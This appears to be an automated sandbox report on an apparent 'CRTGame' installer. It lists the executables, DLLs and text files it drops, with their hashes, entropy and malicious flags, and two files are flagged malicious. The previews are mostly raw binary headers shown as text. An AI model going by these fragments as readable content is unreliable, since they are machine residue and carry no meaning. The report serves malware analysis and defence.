                                                                            SSDEEP:6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
                                                                            MD5:B3B487FC3832B607A853211E8AC42CAD
                                                                            SHA1:06E32C28103D33DAD53BE06C894203F8808D38C1
                                                                            SHA-256:30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
                                                                            SHA-512:FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
                                                                            Malicious:false
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):294926
                                                                            Entropy (8bit):6.191604766067493
                                                                            Encrypted:false
                                                                            SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                            MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                            SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                            SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                            SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):13838
                                                                            Entropy (8bit):5.173769974589746
                                                                            Encrypted:false
                                                                            SSDEEP:192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
                                                                            MD5:9C55B3E5ED1365E82AE9D5DA3EAEC9F2
                                                                            SHA1:BB3D30805A84C6F0803BE549C070F21C735E10A9
                                                                            SHA-256:D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
                                                                            SHA-512:EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):258560
                                                                            Entropy (8bit):6.491223412910377
                                                                            Encrypted:false
                                                                            SSDEEP:6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
                                                                            MD5:DB191B89F4D015B1B9AEE99AC78A7E65
                                                                            SHA1:8DAC370768E7480481300DD5EBF8BA9CE36E11E3
                                                                            SHA-256:38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
                                                                            SHA-512:A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:modified
                                                                            Size (bytes):2199540
                                                                            Entropy (8bit):6.34382356471681
                                                                            Encrypted:false
                                                                            SSDEEP:24576:vWtUNVKKo/Ji9iOu/6fVTC75GvMQ5HwTQKmMEV7anImzSVG61jZJ+WFchgsvKIgX:+t0Z590/6o75QHW7mMwmzialW7R5Z/h
                                                                            MD5:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                            SHA1:5017DC7277DBC5BB0B6F8428E4FF72603E3A370B
                                                                            SHA-256:59495C6E79C301F767F3D336050FB9927826F0AE972D634D395F5B44D7280A09
                                                                            SHA-512:4BE3E838FB41CD4D01A12B639CDCB93DF94DEEC0DEBD2593C53BBFE977DAF5BCB9E3F97F6C47D33E76AEA12AE2F9224F27652DFB5B5A69F53D201184766FFF91
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L.....ue.................@...................P....@...........................!......."......................................Y..P........G...........................................................................P...............................text....;.......@.................. ..`.rdata.......P... ...P..............@..@.data....P...p...0...p..............@....rsrc....G.......P..................@..@.hsave....... ......................`...................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):2199540
                                                                            Entropy (8bit):6.343823195460407
                                                                            Encrypted:false
                                                                            SSDEEP:24576:EWtUNVKKo/Ji9iOu/6fVTC75GvMQ5HwTQKmMEV7anImzSVG61jZJ+WFchgsvKIgX:zt0Z590/6o75QHW7mMwmzialW7R5Z/h
                                                                            MD5:EB732B105CEAE8D6D08B309621C239F5
                                                                            SHA1:B673ABD9B9A11193DE071C3C98B372A0EEFD2C50
                                                                            SHA-256:839DC7452F0E0FD9328B4A19800F630B29AFFDF7D7F30A93E3F19364CB30A1ED
                                                                            SHA-512:F8BC354CA40CC6F47535E60D66B1907A711D28DC3C5822CFD1F461C6173D171358B8BD0FCC912A0AB74CA4046313703D451167544F79A7C182221CF5FEFD4691
                                                                            Malicious:false
                                                                            Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L.....ue.................@...................P....@...........................!......."......................................Y..P........G...........................................................................P...............................text....;.......@.................. ..`.rdata.......P... ...P..............@..@.data....P...p...0...p..............@....rsrc....G.......P..................@..@.hsave....... ......................`...................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:IFF data
                                                                            Category:dropped
                                                                            Size (bytes):1716
                                                                            Entropy (8bit):4.781797138644031
                                                                            Encrypted:false
                                                                            SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                            MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                            SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                            SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                            SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                            Malicious:false
                                                                            Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:IFF data
                                                                            Category:dropped
                                                                            Size (bytes):1716
                                                                            Entropy (8bit):4.781797138644031
                                                                            Encrypted:false
                                                                            SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                            MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                            SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                            SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                            SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                            Malicious:false
                                                                            Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1825
                                                                            Entropy (8bit):5.088030483893024
                                                                            Encrypted:false
                                                                            SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                            MD5:992C00BEAB194CE392117BB419F53051
                                                                            SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                            SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                            SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                            Malicious:false
                                                                            Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:IFF data
                                                                            Category:dropped
                                                                            Size (bytes):1716
                                                                            Entropy (8bit):4.781797138644031
                                                                            Encrypted:false
                                                                            SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                            MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                            SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                            SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                            SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                            Malicious:false
                                                                            Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1825
                                                                            Entropy (8bit):5.088030483893024
                                                                            Encrypted:false
                                                                            SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                            MD5:992C00BEAB194CE392117BB419F53051
                                                                            SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                            SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                            SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                            Malicious:false
                                                                            Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1825
                                                                            Entropy (8bit):5.088030483893024
                                                                            Encrypted:false
                                                                            SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                            MD5:992C00BEAB194CE392117BB419F53051
                                                                            SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                            SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                            SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                            Malicious:false
                                                                            Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):714526
                                                                            Entropy (8bit):6.5053900039496435
                                                                            Encrypted:false
                                                                            SSDEEP:12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
                                                                            MD5:3910EA485B6F67ECAF6B34DDB4BE5980
                                                                            SHA1:85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
                                                                            SHA-256:FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
                                                                            SHA-512:65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
                                                                            Malicious:false
                                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:InnoSetup Log CRTGame, version 0x30, 8020 bytes, 305090\user, "C:\Program Files (x86)\CRTGame"
                                                                            Category:dropped
                                                                            Size (bytes):8020
                                                                            Entropy (8bit):5.053397821818847
                                                                            Encrypted:false
                                                                            SSDEEP:96:p3N8WVPpbbK+T4hlOIhlXWx4cVSQs0Ln9tE2VYW4J:p98WVPp1+QIhs+cVSQ1n1mD
                                                                            MD5:362DC9BD206D9A98C71B5B075EC72964
                                                                            SHA1:CBA7C5D341B6DEAD7EA24286F2331B7FB1422228
                                                                            SHA-256:921B436995429E3E04675BBF173B2A5C793DA828F8A5484D613E1D95BC1648D3
                                                                            SHA-512:517C18CDFD3934D0B0203122FDD8AD28DDC7EEB4585E5B17F34E5F67AF90DF56CA3E069779E0E6D5A5B9853EC41275768D6F6300C32F2D2BA8C8BC76190951A8
                                                                            Malicious:false
                                                                            Preview:Inno Setup Uninstall Log (b)....................................CRTGame.........................................................................................................................CRTGame.........................................................................................................................0...G...T...%...............................................................................................................>7.?......... ........>....305090.user.C:\Program Files (x86)\CRTGame...............#.. ..........h.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...............................o...........!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dll.GetSystemMetr
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):714526
                                                                            Entropy (8bit):6.5053900039496435
                                                                            Encrypted:false
                                                                            SSDEEP:12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
                                                                            MD5:3910EA485B6F67ECAF6B34DDB4BE5980
                                                                            SHA1:85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
                                                                            SHA-256:FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
                                                                            SHA-512:65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
                                                                            Malicious:false
                                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                            Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):2199540
                                                                            Entropy (8bit):6.34382356471681
                                                                            Encrypted:false
                                                                            SSDEEP:24576:vWtUNVKKo/Ji9iOu/6fVTC75GvMQ5HwTQKmMEV7anImzSVG61jZJ+WFchgsvKIgX:+t0Z590/6o75QHW7mMwmzialW7R5Z/h
                                                                            MD5:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                            SHA1:5017DC7277DBC5BB0B6F8428E4FF72603E3A370B
                                                                            SHA-256:59495C6E79C301F767F3D336050FB9927826F0AE972D634D395F5B44D7280A09
                                                                            SHA-512:4BE3E838FB41CD4D01A12B639CDCB93DF94DEEC0DEBD2593C53BBFE977DAF5BCB9E3F97F6C47D33E76AEA12AE2F9224F27652DFB5B5A69F53D201184766FFF91
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L.....ue.................@...................P....@...........................!......."......................................Y..P........G...........................................................................P...............................text....;.......@.................. ..`.rdata.......P... ...P..............@..@.data....P...p...0...p..............@....rsrc....G.......P..................@..@.hsave....... ......................`...................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):4
                                                                            Entropy (8bit):0.8112781244591328
                                                                            Encrypted:false
                                                                            SSDEEP:3:n:n
                                                                            MD5:9F30F3D1265389805615B2BFAC36B1B6
                                                                            SHA1:0EC565074E4C25161A5500F40DB395A6FFD70E56
                                                                            SHA-256:4F8320D91E97D546DC799848E8D218E18050AF7A7964E0414DE9E5479006D7E3
                                                                            SHA-512:89935C422FA6688112D4AC81EE7492701561D8E0C32FC76BDE9E75DC7598E3EB6F3F3F824C08A988C79CE4D4532BA7CE59C728C32096057439266175FAF8C04A
                                                                            Malicious:false
                                                                            Preview:0...
                                                                            Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):128
                                                                            Entropy (8bit):2.862976125752538
                                                                            Encrypted:false
                                                                            SSDEEP:3:1k/QnTzXD9iIgAnDTa3pkHil/:11TzXD9iIxPa3pkHit
                                                                            MD5:785BB7F0B0CEF59C39B9F5E21CD2FD04
                                                                            SHA1:1E1FFDEE1584A00BDE18BD7BD19C02988301C250
                                                                            SHA-256:90B35EC0C6B41ACEC2C9BB51CDDCB6339FB035C222766A4CA4CBB15B7A7D8853
                                                                            SHA-512:6D2449E111F7F059734960B83B0B090A7239EE2D93EB70F839ECDDAA640658B90667F123CFB4FE8E0F5DC0A854A47B62AA2FCAF971D08B9118CAC840DBF999EB
                                                                            Malicious:false
                                                                            Preview:3e0f25005939fee32fa196d33e7a2b8f6ce30e1128f6a30e537a9ba072d59a73................................................................
                                                                            Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8
                                                                            Entropy (8bit):2.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:bcn:A
                                                                            MD5:ED1A025F9B6CF1A009D0D80A8B376BB7
                                                                            SHA1:71ED84526C3BA790366F2AF61B56A1CD5C62DAAB
                                                                            SHA-256:4E52FD6BF2DAFA7AF8E72A856D65FC4EC1A6850D79399A00B5BE7CB96C568CB3
                                                                            SHA-512:F4CB6185FFE7E6E5E4E5EC36774F71B30E7F00F1171B72B60CA5DE0CCF0C3DEE863D7F08054A30F13D31A5B8D0D3315269A4213FABC0687AD0E923313256B537
                                                                            Malicious:false
                                                                            Preview:..\g....
                                                                            Process:C:\Users\user\Desktop\6hvZpn91O8.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):704000
                                                                            Entropy (8bit):6.4972640482038075
                                                                            Encrypted:false
                                                                            SSDEEP:12288:XRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExyc:BObekrkfohrP337uzHnA6cHiiHEVVg6X
                                                                            MD5:F448D7F4B76E5C9C3A4EAFF16A8B9B73
                                                                            SHA1:31808F1FFA84C954376975B7CDB0007E6B762488
                                                                            SHA-256:7233B85EB0F8B3AA5CAE3811D727AA8742FEC4D1091C120A0FE15006F424CC49
                                                                            SHA-512:F8197458CD2764C0B852DAC34F9BF361110A7DC86903024A97C7BCD3F77B148342BF45E3C2B60F6AF8198AE3B83938DBAAD5E007D71A0F88006F3A0618CF36F4
                                                                            Malicious:true
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):4096
                                                                            Entropy (8bit):4.026670007889822
                                                                            Encrypted:false
                                                                            SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                            MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                            SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                            SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                            SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                            Malicious:false
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):2560
                                                                            Entropy (8bit):2.8818118453929262
                                                                            Encrypted:false
                                                                            SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                            MD5:A69559718AB506675E907FE49DEB71E9
                                                                            SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                            SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                            SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                            Malicious:false
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):19456
                                                                            Entropy (8bit):5.8975201046735535
                                                                            Encrypted:false
